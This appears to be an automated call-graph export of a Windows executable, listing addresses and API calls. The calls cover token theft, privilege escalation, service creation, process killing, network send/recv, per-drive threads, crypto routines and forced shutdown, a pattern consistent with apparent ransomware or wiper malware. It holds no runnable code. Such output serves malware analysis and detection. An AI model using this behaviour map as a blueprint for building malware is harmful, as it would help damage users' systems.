4bf7936 4929->4931 5134 4bf7cc5 GetCurrentProcess OpenProcessToken 4930->5134 4931->4874 4944 4bf923f 4931->4944 4933 4bf78cc 4934 4bf7cc5 6 API calls 4933->4934 4935 4bf78db 4934->4935 4936 4bf7cc5 6 API calls 4935->4936 4937 4bf78ec 4936->4937 5139 4bf855f CreateToolhelp32Snapshot 4937->5139 4940 4bf554a 4 API calls 4941 4bf790e GetModuleFileNameW 4940->4941 4941->4931 4942 4bf7931 4941->4942 5145 4bf8832 CreateFileW 4942->5145 4945 4bf932c 4944->4945 4946 4bf9252 4944->4946 4945->4874 4946->4945 4947 4bf925e VirtualAlloc 4946->4947 4948 4bf928b memcpy 4947->4948 4949 4bf9329 4947->4949 4950 4bf92f8 VirtualProtect 4948->4950 4953 4bf92a9 4948->4953 4949->4945 4950->4949 4951 4bf930d VirtualFree 4950->4951 4951->4949 4953->4950 5154 4bf8f35 VirtualProtect 4953->5154 4957 4bf7a01 4956->4957 4959 4bf7f45 4956->4959 4957->4878 4957->4880 4958 4bf7f74 wsprintfW CreateMutexW 4960 4bf7fab GetLastError 4958->4960 4961 4bf7f99 GetLastError 4958->4961 4959->4958 4960->4957 4961->4957 5158 4bf7e69 PathCombineW 4962->5158 4965 4bf7eaa PathFileExistsW 4966 4bf7efc ExitProcess 4965->4966 4967 4bf7ebb GetCurrentProcess 4965->4967 5160 4bf6f7c GetModuleHandleW GetProcAddress 4967->5160 4973 4bf7ef4 4973->4879 4975 4bf7a20 4974->4975 4976 4bf8509 Process32FirstW 4974->4976 4983 4bf10a7 4975->4983 4977 4bf8523 4976->4977 4978 4bf8548 4977->4978 4980 4bf854a 4977->4980 4981 4bf8536 Process32NextW 4977->4981 4979 4bf8555 FindCloseChangeNotification 4978->4979 4979->4975 5207 4bf841d 4980->5207 4981->4977 4984 4bf11e9 WSAStartup 4983->4984 4985 4bf10c3 4983->4985 4999 4bf6c5f GetProcessHeap HeapAlloc 4984->4999 4986 4bf10cc ExpandEnvironmentStringsW 4985->4986 4987 4bf10ec 4985->4987 4986->4987 4988 4bf8313 18 API calls 4987->4988 4989 4bf1176 4988->4989 4989->4984 4990 4bf1193 PathAppendW 4989->4990 4991 4bf11a9 4990->4991 4992 4bf11d7 GetProcessHeap HeapFree 4990->4992 4993 4bf87e7 3 API calls 4991->4993 4992->4984 4994 4bf11bb 4993->4994 4994->4992 5221 4bf1000 4994->5221 5000 4bf6cbd 4999->5000 5001 4bf6c80 InitializeCriticalSection GetProcessHeap RtlAllocateHeap 4999->5001 5000->4888 5001->5000 5002 4bf6cb8 5001->5002 5281 4bf6bd1 5002->5281 5005 4bf660d 5004->5005 5006 4bf6540 5004->5006 5019 4bf7dd0 5005->5019 5006->5005 5007 4bf655b CommandLineToArgvW 5006->5007 5007->5005 5008 4bf6576 5007->5008 5009 4bf657f StrToIntW 5008->5009 5010 4bf6606 LocalFree 5008->5010 5014 4bf6591 5009->5014 5010->5005 5011 4bf65a2 StrStrW 5012 4bf65c2 StrStrW 5011->5012 5011->5014 5013 4bf65dc StrChrW 5012->5013 5012->5014 5013->5014 5016 4bf65e9 5013->5016 5014->5010 5014->5011 5018 4bf6605 5014->5018 5288 4bf64a6 5014->5288 5296 4bf69ae 5016->5296 5018->5010 5314 4bf6477 GetTickCount 5019->5314 5021 4bf7ddc NetServerGetInfo 5022 4bf7e03 5021->5022 5023 4bf7e0e NetApiBufferFree 5022->5023 5024 4bf7aa3 5022->5024 5023->5024 5025 4bf8192 5024->5025 5026 4bf81ab GetLocalTime 5025->5026 5027 4bf7aa8 CreateEventW CreateThread 5025->5027 5315 4bf6477 GetTickCount 5026->5315 5027->4896 5027->4897 6235 4bf8a6f GetSystemMetrics 5027->6235 5029 4bf81ba GetSystemDirectoryW 5029->5027 5031 4bf8200 PathAppendW 5029->5031 5031->5027 5032 4bf82b9 wsprintfW 5031->5032 5033 4bf7fb7 6 API calls 5032->5033 5033->5027 5316 4bfa760 5034->5316 5037 4bf6f7c 2 API calls 5038 4bf7170 5037->5038 5039 4bf8313 18 API calls 5038->5039 5040 4bf717f 5039->5040 5041 4bf7339 5040->5041 5042 4bf71a0 GetTempFileNameW 5040->5042 5041->4899 5043 4bf7317 GetProcessHeap RtlFreeHeap 5042->5043 5044 4bf71b8 CoCreateGuid 5042->5044 5043->5041 5044->5043 5045 4bf71d6 StringFromCLSID 5044->5045 5045->5043 5047 4bf71ef 5045->5047 5318 4bf6faf CreateFileW 5047->5318 5050 4bf730c CoTaskMemFree 5050->5043 5051 4bf7209 wsprintfW CreateThread 5052 4bf72dc 5051->5052 5053 4bf7247 memset wsprintfW CreateProcessW 5051->5053 5324 4bf6ffe GetProcessHeap HeapAlloc 5051->5324 5057 4bf6faf 3 API calls 5052->5057 5054 4bf72d3 CloseHandle 5053->5054 5055 4bf72b0 WaitForSingleObject 5053->5055 5054->5052 5056 4bf6cc8 3 API calls 5055->5056 5058 4bf72c9 TerminateThread 5056->5058 5059 4bf72ff DeleteFileW 5057->5059 5058->5054 5059->5050 5061 4bf6ccc EnterCriticalSection InterlockedExchange LeaveCriticalSection 5060->5061 5062 4bf6cea 5060->5062 5061->4906 5062->4906 5064 4bf7b89 Sleep 5063->5064 5065 4bfa445 CreateThread 5063->5065 5064->4896 5065->5064 5066 4bfa461 GetProcessHeap HeapFree 5065->5066 5342 4bfa333 Sleep 5065->5342 5066->5064 5068 4bf556b GetLastError 5067->5068 5069 4bf5578 CryptGenRandom CryptReleaseContext 5067->5069 5068->5069 5070 4bf5594 5068->5070 5069->5070 5070->4900 5071 4bf636b GetLogicalDrives 5070->5071 5072 4bf638a 5071->5072 5073 4bf6397 GetDriveTypeW 5072->5073 5075 4bf6413 5072->5075 5073->5072 5074 4bf63c3 LocalAlloc 5073->5074 5074->5072 5076 4bf63d3 CreateThread 5074->5076 5075->4900 5076->5072 5931 4bf6299 CreateEventW 5076->5931 6107 4bf808e wsprintfW wsprintfW wsprintfW wsprintfW 5077->6107 5080 4bf8a3f 5082 4bf8a48 InitiateSystemShutdownExW 5080->5082 5083 4bf8a67 ExitProcess 5080->5083 5081 4bf7fb7 6 API calls 5081->5080 5082->5083 5084 4bf8a5e ExitWindowsEx 5082->5084 5084->5083 5086 4bfa760 5085->5086 5087 4bf860b memset 5086->5087 6112 4bf8147 memset GetVersionExW 5087->6112 5090 4bf87da 5090->4927 5091 4bf8658 Process32FirstW 5092 4bf87ca GetLastError 5091->5092 5100 4bf8674 5091->5100 5094 4bf87d0 CloseHandle 5092->5094 5093 4bf8689 OpenProcess 5095 4bf86b2 OpenProcessToken 5093->5095 5093->5100 5094->5090 5097 4bf8798 CloseHandle CloseHandle 5095->5097 5098 4bf86c7 GetTokenInformation 5095->5098 5096 4bf87b1 Process32NextW 5096->5093 5099 4bf87c8 5096->5099 5097->5100 5098->5097 5098->5100 5099->5094 5100->5093 5100->5094 5100->5096 5100->5097 5101 4bf86f9 DuplicateTokenEx 5100->5101 5103 4bf875a SetTokenInformation 5100->5103 5101->5097 5102 4bf8716 memset GetTokenInformation 5101->5102 5102->5097 5102->5100 5103->5097 5103->5100 5105 4bfa40d 5104->5105 5106 4bfa3d6 SetThreadToken 5104->5106 6114 4bfa016 GetCurrentThread OpenThreadToken 5104->6114 5107 4bfa410 SetLastError 5105->5107 5108 4bfa3f7 GetLastError 5106->5108 5109 4bfa3e7 ResumeThread 5106->5109 5107->4927 5111 4bfa3ff CloseHandle 5108->5111 5109->5107 5110 4bfa3f5 5109->5110 5110->5111 5111->5107 5113 4bf7995 SetThreadToken 5112->5113 5114 4bf79d0 5112->5114 6216 4bf7957 5112->6216 5115 4bf79c7 CloseHandle 5113->5115 5116 4bf79a6 ResumeThread 5113->5116 5114->4927 5115->5114 5117 4bf79b4 WaitForSingleObject 5116->5117 5118 4bf79c1 GetLastError 5116->5118 5117->5115 5118->5115 5120 4bf6e7c 5119->5120 5121 4bf6f73 5119->5121 5120->5121 5122 4bf6e85 EnterCriticalSection 5120->5122 5121->4927 5123 4bf6da4 3 API calls 5122->5123 5124 4bf6e98 5123->5124 5125 4bf6f6b LeaveCriticalSection 5124->5125 5126 4bf6eae GetProcessHeap HeapAlloc 5124->5126 5127 4bf6f31 GetProcessHeap HeapReAlloc 5124->5127 5125->5121 5126->5125 5128 4bf6ed4 GetProcessHeap HeapAlloc 5126->5128 5127->5125 5129 4bf6f52 5127->5129 5130 4bf6ef3 memcpy 5128->5130 5131 4bf6f21 GetProcessHeap HeapFree 5128->5131 5132 4bf6e66 3 API calls 5129->5132 5130->5125 5131->5125 5133 4bf6f68 5132->5133 5133->5125 5135 4bf7d3c SetLastError 5134->5135 5136 4bf7cfa LookupPrivilegeValueW 5134->5136 5135->4933 5136->5135 5137 4bf7d0c AdjustTokenPrivileges GetLastError 5136->5137 5137->5135 5138 4bf7d3a 5137->5138 5138->5135 5140 4bf857d Process32FirstW 5139->5140 5141 4bf78fe 5139->5141 5143 4bf8597 5140->5143 5141->4940 5142 4bf85ee CloseHandle 5142->5141 5143->5142 5144 4bf85dc Process32NextW 5143->5144 5144->5143 5146 4bf88cd 5145->5146 5147 4bf885d GetFileSize 5145->5147 5146->4931 5148 4bf886c GetProcessHeap HeapAlloc 5147->5148 5149 4bf88c3 CloseHandle 5147->5149 5150 4bf88af 5148->5150 5151 4bf8882 ReadFile 5148->5151 5149->5146 5150->5149 5151->5150 5152 4bf8899 5151->5152 5152->5150 5153 4bf889e GetProcessHeap HeapFree 5152->5153 5153->5150 5155 4bf8fc8 5154->5155 5156 4bf8f58 5154->5156 5155->4950 5156->5155 5157 4bf8fa1 VirtualProtect 5156->5157 5157->5156 5159 4bf7e86 5158->5159 5159->4965 5159->4973 5161 4bf6f9f 5160->5161 5162 4bf8313 FindResourceW 5161->5162 5163 4bf833a LoadResource 5162->5163 5164 4bf7edd 5162->5164 5163->5164 5165 4bf834f LockResource 5163->5165 5164->4973 5177 4bf87e7 CreateFileW 5164->5177 5165->5164 5166 4bf8361 SizeofResource 5165->5166 5166->5164 5167 4bf8379 GetProcessHeap RtlAllocateHeap 5166->5167 5167->5164 5168 4bf8395 memcpy 5167->5168 5169 4bf83ab 5168->5169 5170 4bf83b5 GetProcessHeap RtlAllocateHeap 5168->5170 5169->5170 5171 4bf8407 GetProcessHeap RtlFreeHeap 5170->5171 5172 4bf83c7 5170->5172 5171->5164 5182 4bfa790 5172->5182 5174 4bf83e1 5175 4bf83fa GetProcessHeap HeapFree 5174->5175 5176 4bf83e5 5174->5176 5175->5171 5176->5171 5178 4bf882a 5177->5178 5179 4bf8809 WriteFile 5177->5179 5178->4973 5180 4bf8823 FindCloseChangeNotification 5179->5180 5181 4bf881d 5179->5181 5180->5178 5181->5180 5187 4bfbda1 5182->5187 5186 4bfa7d9 5186->5174 5196 4bfbd14 5187->5196 5189 4bfa7c9 5189->5186 5190 4bfa83c 5189->5190 5191 4bfa850 5190->5191 5195 4bfaed0 5190->5195 5192 4bfac8f memcpy 5191->5192 5193 4bfbb4f 5191->5193 5191->5195 5192->5191 5193->5195 5201 4bfbecb 5193->5201 5195->5186 5197 4bfbd21 5196->5197 5198 4bfbd33 5196->5198 5197->5198 5200 4bfc493 malloc 5197->5200 5198->5189 5200->5198 5202 4bfbee1 5201->5202 5203 4bfbf39 memcpy 5202->5203 5204 4bfbf21 memcpy 5202->5204 5206 4bfbefa 5202->5206 5205 4bfbf58 memcpy 5203->5205 5203->5206 5204->5206 5205->5206 5206->5195 5208 4bf84e8 5207->5208 5209 4bf8430 GetCurrentProcessId 5207->5209 5208->4979 5209->5208 5210 4bf843f OpenProcess 5209->5210 5210->5208 5211 4bf845c OpenProcessToken 5210->5211 5212 4bf84e4 CloseHandle 5211->5212 5213 4bf8474 DuplicateToken 5211->5213 5212->5208 5214 4bf84df CloseHandle 5213->5214 5215 4bf8487 AllocateAndInitializeSid 5213->5215 5214->5212 5216 4bf84ad CheckTokenMembership 5215->5216 5217 4bf84da CloseHandle 5215->5217 5218 4bf84c4 5216->5218 5219 4bf84d1 FreeSid 5216->5219 5217->5214 5218->5219 5220 4bf84c9 TerminateProcess 5218->5220 5219->5217 5220->5219 5245 4bf7fb7 wsprintfW GetEnvironmentVariableW 5221->5245 5224 4bf101c Sleep 5225 4bf1027 GetEnvironmentVariableW 5224->5225 5226 4bf106b wsprintfW 5225->5226 5227 4bf1043 GetSystemDirectoryW 5225->5227 5229 4bf7fb7 6 API calls 5226->5229 5228 4bf1055 lstrcatW 5227->5228 5230 4bf109d 5227->5230 5228->5226 5228->5230 5229->5230 5231 4bf1531 5230->5231 5232 4bf1533 5231->5232 5232->5232 5252 4bf1368 OpenSCManagerW 5232->5252 5235 4bf155a 5244 4bf11d0 5235->5244 5260 4bf11ef RegOpenKeyW 5235->5260 5239 4bf11ef 7 API calls 5240 4bf1582 5239->5240 5241 4bf1588 GetVersion 5240->5241 5240->5244 5242 4bf1592 5241->5242 5241->5244 5243 4bf11ef 7 API calls 5242->5243 5243->5244 5244->4992 5246 4bf8004 GetSystemDirectoryW 5245->5246 5249 4bf802c 5245->5249 5247 4bf8016 lstrcatW 5246->5247 5248 4bf1018 5246->5248 5247->5248 5247->5249 5248->5224 5248->5225 5249->5249 5250 4bf8046 CreateProcessW 5249->5250 5250->5248 5251 4bf8075 Sleep 5250->5251 5251->5248 5253 4bf138e CreateServiceW 5252->5253 5254 4bf1383 GetLastError 5252->5254 5256 4bf13c7 GetLastError 5253->5256 5257 4bf13c2 5253->5257 5255 4bf13e1 5254->5255 5255->5235 5269 4bf13e8 wsprintfW RegOpenKeyExW 5255->5269 5256->5257 5258 4bf13dd CloseServiceHandle 5257->5258 5259 4bf13da CloseServiceHandle 5257->5259 5258->5255 5259->5258 5261 4bf1364 5260->5261 5262 4bf1212 RegQueryValueExW 5260->5262 5261->5239 5261->5244 5268 4bf125c 5262->5268 5264 4bf1356 RegCloseKey 5264->5261 5265 4bf134f 5265->5264 5266 4bf12f0 memmove memcpy RegSetValueExW 5266->5264 5267 4bf1341 RegFlushKey 5266->5267 5267->5264 5268->5264 5268->5265 5268->5266 5270 4bf152b 5269->5270 5271 4bf1435 RegQueryValueExW 5269->5271 5270->5235 5272 4bf1461 5271->5272 5273 4bf1520 RegCloseKey 5271->5273 5272->5273 5274 4bf146a RegSetValueExW 5272->5274 5273->5270 5274->5273 5275 4bf1488 RegSetValueExW 5274->5275 5275->5273 5276 4bf149f RegSetValueExW 5275->5276 5276->5273 5277 4bf14b9 RegSetValueExW 5276->5277 5277->5273 5278 4bf14d1 RegSetValueExW 5277->5278 5278->5273 5279 4bf14ef RegSetValueExW 5278->5279 5279->5273 5280 4bf1507 5279->5280 5280->5273 5280->5280 5282 4bf6c5d 5281->5282 5285 4bf6bdd 5281->5285 5282->5000 5283 4bf6c53 GetProcessHeap HeapFree 5283->5282 5284 4bf6c49 GetProcessHeap HeapFree 5284->5283 5285->5283 5285->5284 5286 4bf6c2e GetProcessHeap HeapFree 5285->5286 5287 4bf6c1c GetProcessHeap HeapFree 5285->5287 5286->5285 5287->5286 5289 4bf64d4 CommandLineToArgvW 5288->5289 5290 4bf64c0 5288->5290 5291 4bf6528 5289->5291 5295 4bf64e8 5289->5295 5290->5289 5291->5014 5292 4bf6521 LocalFree 5292->5291 5294 4bf6520 5294->5292 5295->5292 5295->5294 5310 4bf6b95 5295->5310 5297 4bf69c7 5296->5297 5297->5297 5298 4bf69d2 GetProcessHeap HeapAlloc 5297->5298 5299 4bf6a9e 5298->5299 5300 4bf69f9 memcpy 5298->5300 5299->5014 5302 4bf6a27 5300->5302 5302->5302 5303 4bf6a32 GetProcessHeap HeapAlloc 5302->5303 5304 4bf6a4f memcpy 5303->5304 5305 4bf6a94 GetProcessHeap HeapFree 5303->5305 5307 4bf6e66 14 API calls 5304->5307 5305->5299 5308 4bf6a84 5307->5308 5308->5299 5309 4bf6a8b GetProcessHeap HeapFree 5308->5309 5309->5305 5311 4bf6bc9 5310->5311 5312 4bf6b9f 5310->5312 5311->5295 5312->5311 5313 4bf6e66 14 API calls 5312->5313 5313->5311 5314->5021 5315->5029 5317 4bf7153 GetCurrentProcess 5316->5317 5317->5037 5319 4bf6ff6 5318->5319 5320 4bf6fd2 WriteFile 5318->5320 5319->5050 5319->5051 5321 4bf6fef CloseHandle 5320->5321 5322 4bf6fe9 5320->5322 5321->5319 5322->5321 5323 4bf6fee 5322->5323 5323->5321 5325 4bf713d 5324->5325 5326 4bf7039 InitializeSecurityDescriptor 5324->5326 5326->5325 5327 4bf704a SetSecurityDescriptorDacl 5326->5327 5327->5325 5328 4bf705f CreateNamedPipeW 5327->5328 5328->5328 5329 4bf707d ConnectNamedPipe 5328->5329 5330 4bf712f CloseHandle 5329->5330 5331 4bf708d 5329->5331 5330->5328 5332 4bf7090 PeekNamedPipe 5331->5332 5333 4bf70bf GetProcessHeap HeapAlloc 5331->5333 5334 4bf70ae Sleep 5331->5334 5335 4bf70bd 5331->5335 5332->5331 5336 4bf711d FlushFileBuffers DisconnectNamedPipe 5333->5336 5337 4bf70d3 ReadFile 5333->5337 5334->5331 5335->5336 5336->5330 5338 4bf70ec 5337->5338 5339 4bf7112 GetProcessHeap HeapFree 5337->5339 5338->5339 5340 4bf70f4 StrChrW 5338->5340 5341 4bf69ae 24 API calls 5338->5341 5339->5336 5340->5338 5340->5339 5341->5339 5351 4bf6b0e 5342->5351 5344 4bfa396 GetProcessHeap HeapFree 5346 4bfa35c 5346->5344 5349 4bfa390 5346->5349 5354 4bf9f27 5346->5354 5360 4bf6b5f 5346->5360 5364 4bf6ad0 5346->5364 5367 4bf6b46 GetProcessHeap HeapFree 5349->5367 5368 4bf6ced GetProcessHeap HeapAlloc 5351->5368 5355 4bf9f34 5354->5355 5380 4bf6735 5355->5380 5357 4bf9f6d 5357->5346 5358 4bf9f51 5358->5357 5392 4bf9376 PathFindFileNameW 5358->5392 5361 4bf6b71 5360->5361 5361->5361 5913 4bf6e1b 5361->5913 5365 4bf6d35 3 API calls 5364->5365 5366 4bf6ae1 5365->5366 5366->5346 5367->5344 5369 4bf6b24 5368->5369 5370 4bf6d0b 5368->5370 5369->5346 5374 4bf6d35 5370->5374 5373 4bf6d20 GetProcessHeap HeapFree 5373->5369 5375 4bf6d1c 5374->5375 5378 4bf6d3e 5374->5378 5375->5369 5375->5373 5376 4bf6d43 EnterCriticalSection 5376->5378 5377 4bf6d7e LeaveCriticalSection 5377->5375 5377->5378 5378->5375 5378->5376 5378->5377 5379 4bf6d92 Sleep 5378->5379 5379->5376 5400 4bf6477 GetTickCount 5380->5400 5382 4bf6743 wsprintfW 5384 4bf676a 5382->5384 5384->5384 5385 4bf6775 EnterCriticalSection 5384->5385 5386 4bf6797 5385->5386 5387 4bf6792 5385->5387 5389 4bf67dd SetLastError 5386->5389 5390 4bf67bb StrCatW StrCatW 5386->5390 5401 4bf6628 5387->5401 5391 4bf67e5 LeaveCriticalSection 5389->5391 5390->5391 5391->5358 5393 4bf93aa WideCharToMultiByte WideCharToMultiByte inet_addr 5392->5393 5398 4bf943a 5392->5398 5394 4bf9403 WideCharToMultiByte 5393->5394 5395 4bf93f3 5393->5395 5417 4bf5337 GetProcessHeap HeapAlloc 5394->5417 5446 4bf9332 gethostbyname 5395->5446 5398->5357 5400->5382 5410 4bf686c 5401->5410 5403 4bf6722 5403->5386 5404 4bf6661 wsprintfW 5409 4bf6651 5404->5409 5405 4bf66ec StrCatW 5413 4bf6893 5405->5413 5406 4bf671a 5416 4bf6b46 GetProcessHeap HeapFree 5406->5416 5409->5403 5409->5404 5409->5405 5409->5406 5411 4bf6ced 7 API calls 5410->5411 5412 4bf6880 5411->5412 5412->5409 5414 4bf6d35 3 API calls 5413->5414 5415 4bf68a4 5414->5415 5415->5409 5416->5403 5418 4bf54fd 5417->5418 5419 4bf5365 rand 5417->5419 5418->5398 5420 4bf5398 rand socket 5419->5420 5421 4bf5391 5419->5421 5422 4bf54ed GetProcessHeap HeapFree 5420->5422 5423 4bf53c5 htons inet_addr connect 5420->5423 5421->5420 5422->5418 5424 4bf54d7 closesocket 5423->5424 5425 4bf5406 5423->5425 5424->5422 5449 4bf1ca3 GetProcessHeap RtlAllocateHeap 5425->5449 5431 4bf54c6 5514 4bf1dd1 GetProcessHeap HeapAlloc 5431->5514 5443 4bf54ac 5554 4bf516b 5443->5554 5447 4bf936f 5446->5447 5448 4bf9345 wsprintfA 5446->5448 5447->5394 5447->5398 5448->5447 5450 4bf1dc7 5449->5450 5451 4bf1cd3 GetProcessHeap HeapAlloc 5449->5451 5450->5424 5460 4bf2191 5450->5460 5452 4bf1ce6 htons send 5451->5452 5453 4bf1db5 GetProcessHeap HeapFree 5451->5453 5454 4bf1da5 GetProcessHeap HeapFree 5452->5454 5455 4bf1d30 recv 5452->5455 5453->5450 5454->5453 5455->5454 5456 4bf1d47 5455->5456 5456->5454 5579 4bf1c3a 5456->5579 5458 4bf1d5b 5458->5454 5587 4bf1747 5458->5587 5461 4bf1eb9 11 API calls 5460->5461 5462 4bf21a8 5461->5462 5463 4bf2054 11 API calls 5462->5463 5464 4bf21d0 5462->5464 5463->5462 5464->5431 5465 4bf46c7 GetProcessHeap HeapAlloc 5464->5465 5466 4bf46fa 5465->5466 5467 4bf4aa4 5465->5467 5654 4bf2497 GetProcessHeap HeapAlloc 5466->5654 5501 4bf21dc GetProcessHeap HeapAlloc 5467->5501 5469 4bf471c 5470 4bf47b1 GetProcessHeap HeapFree 5469->5470 5471 4bf4741 5469->5471 5470->5467 5472 4bf4745 5471->5472 5479 4bf475a 5471->5479 5672 4bf2e12 GetProcessHeap HeapAlloc 5472->5672 5475 4bf4754 5475->5470 5707 4bf317c GetProcessHeap HeapAlloc 5475->5707 5477 4bf21dc 19 API calls 5477->5479 5479->5475 5479->5477 5480 4bf47ae 5479->5480 5481 4bf478a Sleep 5479->5481 5682 4bf29a2 GetProcessHeap HeapAlloc 5479->5682 5480->5470 5483 4bf2191 22 API calls 5481->5483 5482 4bf47e9 GetProcessHeap HeapAlloc 5482->5470 5484 4bf4802 5482->5484 5483->5479 5485 4bf480c GetProcessHeap HeapAlloc 5484->5485 5496 4bf486a 5484->5496 5487 4bf481d 5485->5487 5485->5496 5486 4bf49a6 GetProcessHeap HeapAlloc 5486->5496 5715 4bf3209 GetProcessHeap HeapAlloc 5487->5715 5488 4bf4888 Sleep GetProcessHeap HeapAlloc 5489 4bf4a91 GetProcessHeap HeapFree 5488->5489 5488->5496 5489->5470 5492 4bf4872 GetProcessHeap HeapFree 5492->5496 5494 4bf4a42 5733 4bf3680 GetProcessHeap HeapAlloc 5494->5733 5496->5486 5496->5488 5496->5489 5496->5492 5496->5494 5720 4bf32af GetProcessHeap HeapAlloc 5496->5720 5728 4bf33a4 GetProcessHeap HeapAlloc 5496->5728 5499 4bf4a86 5499->5489 5502 4bf233b 5501->5502 5503 4bf220b GetProcessHeap HeapAlloc 5501->5503 5502->5431 5523 4bf1eb9 GetProcessHeap HeapAlloc 5502->5523 5504 4bf232c GetProcessHeap HeapFree 5503->5504 5505 4bf2222 htons send 5503->5505 5504->5502 5506 4bf2263 recv 5505->5506 5507 4bf2320 GetProcessHeap HeapFree 5505->5507 5506->5507 5508 4bf227f 5506->5508 5507->5504 5508->5507 5509 4bf228c memset GetProcessHeap HeapAlloc 5508->5509 5509->5507 5510 4bf22b3 htons send 5509->5510 5511 4bf22e4 recv 5510->5511 5512 4bf2311 GetProcessHeap HeapFree 5510->5512 5511->5512 5513 4bf22fc 5511->5513 5512->5507 5513->5512 5515 4bf1dff GetProcessHeap HeapAlloc 5514->5515 5516 4bf1eb0 5514->5516 5517 4bf1e9d GetProcessHeap HeapFree 5515->5517 5518 4bf1e13 htons send 5515->5518 5516->5424 5517->5516 5519 4bf1e8d GetProcessHeap HeapFree 5518->5519 5520 4bf1e54 recv 5518->5520 5519->5517 5520->5519 5521 4bf1e6d 5520->5521 5521->5519 5522 4bf1e73 memset 5521->5522 5522->5519 5524 4bf204b 5523->5524 5525 4bf1ee8 5523->5525 5524->5431 5534 4bf2054 GetProcessHeap HeapAlloc 5524->5534 5525->5525 5526 4bf1f07 GetProcessHeap HeapAlloc 5525->5526 5527 4bf1f2e htons 5526->5527 5528 4bf2038 GetProcessHeap HeapFree 5526->5528 5529 4bf1f79 send 5527->5529 5528->5524 5531 4bf1ffb recv 5529->5531 5532 4bf2028 GetProcessHeap HeapFree 5529->5532 5531->5532 5533 4bf2012 5531->5533 5532->5528 5533->5532 5535 4bf2188 5534->5535 5536 4bf2083 GetProcessHeap HeapAlloc 5534->5536 5535->5431 5545 4bf4ab5 5535->5545 5538 4bf20ab htons 5536->5538 5539 4bf2175 GetProcessHeap HeapFree 5536->5539 5540 4bf20d6 5538->5540 5539->5535 5540->5540 5541 4bf2127 send 5540->5541 5542 4bf213b recv 5541->5542 5543 4bf2165 GetProcessHeap HeapFree 5541->5543 5542->5543 5544 4bf2152 5542->5544 5543->5539 5544->5543 5546 4bf2054 11 API calls 5545->5546 5547 4bf4ad3 5546->5547 5548 4bf4b10 5547->5548 5549 4bf2f5a 12 API calls 5547->5549 5551 4bf4b45 5547->5551 5550 4bf2f5a 12 API calls 5548->5550 5549->5547 5552 4bf4b34 5550->5552 5551->5431 5551->5443 5552->5551 5553 4bf21dc 19 API calls 5552->5553 5553->5551 5555 4bf1eb9 11 API calls 5554->5555 5556 4bf518b 5555->5556 5557 4bf532d 5556->5557 5558 4bf2054 11 API calls 5556->5558 5557->5431 5559 4bf51ab 5558->5559 5559->5557 5862 4bf4e60 GetProcessHeap HeapAlloc 5559->5862 5562 4bf51c7 GetProcessHeap HeapAlloc 5562->5557 5563 4bf51e9 5562->5563 5871 4bf4f43 GetProcessHeap HeapAlloc 5563->5871 5566 4bf531f GetProcessHeap HeapFree 5566->5557 5567 4bf5201 GetProcessHeap HeapAlloc 5567->5566 5568 4bf5215 6 API calls 5567->5568 5569 4bf5311 GetProcessHeap HeapFree 5568->5569 5570 4bf5261 sprintf 5568->5570 5569->5566 5881 4bf4b5d 5570->5881 5574 4bf5305 GetProcessHeap HeapFree 5574->5569 5580 4bf686c 7 API calls 5579->5580 5581 4bf1c5b 5580->5581 5582 4bf1c99 5581->5582 5583 4bf1747 54 API calls 5581->5583 5584 4bf1c93 5581->5584 5585 4bf6893 3 API calls 5581->5585 5582->5458 5583->5581 5632 4bf6b46 GetProcessHeap HeapFree 5584->5632 5585->5581 5588 4bf175a 5587->5588 5588->5588 5589 4bf1765 GetProcessHeap HeapAlloc 5588->5589 5590 4bf1c30 5589->5590 5591 4bf179b 5589->5591 5590->5458 5591->5591 5592 4bf17b1 CharUpperW 5591->5592 5593 4bf17be 5592->5593 5593->5593 5594 4bf17c9 GetProcessHeap HeapAlloc 5593->5594 5595 4bf17ec htons 5594->5595 5596 4bf1c22 GetProcessHeap HeapFree 5594->5596 5597 4bf184e 5595->5597 5596->5590 5597->5597 5598 4bf1859 send 5597->5598 5599 4bf1c16 GetProcessHeap HeapFree 5598->5599 5600 4bf1871 recv 5598->5600 5599->5596 5600->5599 5601 4bf1890 5600->5601 5601->5599 5602 4bf18d4 5601->5602 5603 4bf18d9 GetProcessHeap HeapAlloc 5601->5603 5602->5599 5603->5599 5604 4bf190a 5603->5604 5633 4bf15a7 GetProcessHeap HeapAlloc 5604->5633 5607 4bf1c08 GetProcessHeap HeapFree 5607->5599 5608 4bf15a7 16 API calls 5609 4bf1946 5608->5609 5609->5607 5610 4bf194e GetProcessHeap HeapAlloc 5609->5610 5611 4bf1bfa GetProcessHeap HeapFree 5610->5611 5612 4bf1968 5610->5612 5611->5607 5613 4bf1983 rand 5612->5613 5613->5613 5614 4bf1996 5613->5614 5615 4bf15a7 16 API calls 5614->5615 5616 4bf19ac 5615->5616 5617 4bf1bec GetProcessHeap HeapFree 5616->5617 5618 4bf19b4 GetProcessHeap HeapAlloc 5616->5618 5617->5611 5619 4bf1bde GetProcessHeap HeapFree 5618->5619 5620 4bf19c8 GetProcessHeap HeapAlloc 5618->5620 5619->5617 5622 4bf1a26 htons 5620->5622 5623 4bf1bc3 GetProcessHeap HeapFree 5620->5623 5624 4bf1a76 memcpy 5622->5624 5623->5619 5626 4bf1b57 send 5624->5626 5628 4bf1b84 recv 5626->5628 5629 4bf1bb3 GetProcessHeap HeapFree 5626->5629 5628->5629 5630 4bf1b9d memset 5628->5630 5629->5623 5630->5629 5632->5582 5634 4bf173d 5633->5634 5635 4bf15f1 CryptAcquireContextW 5633->5635 5634->5607 5634->5608 5635->5634 5636 4bf1611 5635->5636 5637 4bf16be CryptCreateHash 5636->5637 5638 4bf1621 5636->5638 5640 4bf170b 5637->5640 5644 4bf16d4 5637->5644 5639 4bf1628 GetProcessHeap HeapAlloc 5638->5639 5638->5640 5639->5640 5643 4bf1642 CryptImportKey 5639->5643 5641 4bf1717 CryptDestroyHash 5640->5641 5642 4bf1720 5640->5642 5641->5642 5645 4bf172e 5642->5645 5646 4bf1725 CryptDestroyKey 5642->5646 5647 4bf16aa GetProcessHeap HeapFree 5643->5647 5648 4bf1678 CryptCreateHash 5643->5648 5644->5640 5649 4bf16de CryptHashData 5644->5649 5645->5634 5651 4bf1733 CryptReleaseContext 5645->5651 5646->5645 5647->5644 5648->5647 5652 4bf1692 CryptSetHashParam 5648->5652 5649->5640 5650 4bf16f2 CryptGetHashParam 5649->5650 5650->5640 5651->5634 5652->5647 5653 4bf16a6 5652->5653 5653->5647 5655 4bf26ff 5654->5655 5656 4bf24c5 GetProcessHeap HeapAlloc 5654->5656 5655->5469 5657 4bf26ec GetProcessHeap HeapFree 5656->5657 5658 4bf24dc rand htons 5656->5658 5657->5655 5659 4bf256f GetProcessHeap HeapAlloc 5658->5659 5660 4bf255f rand 5658->5660 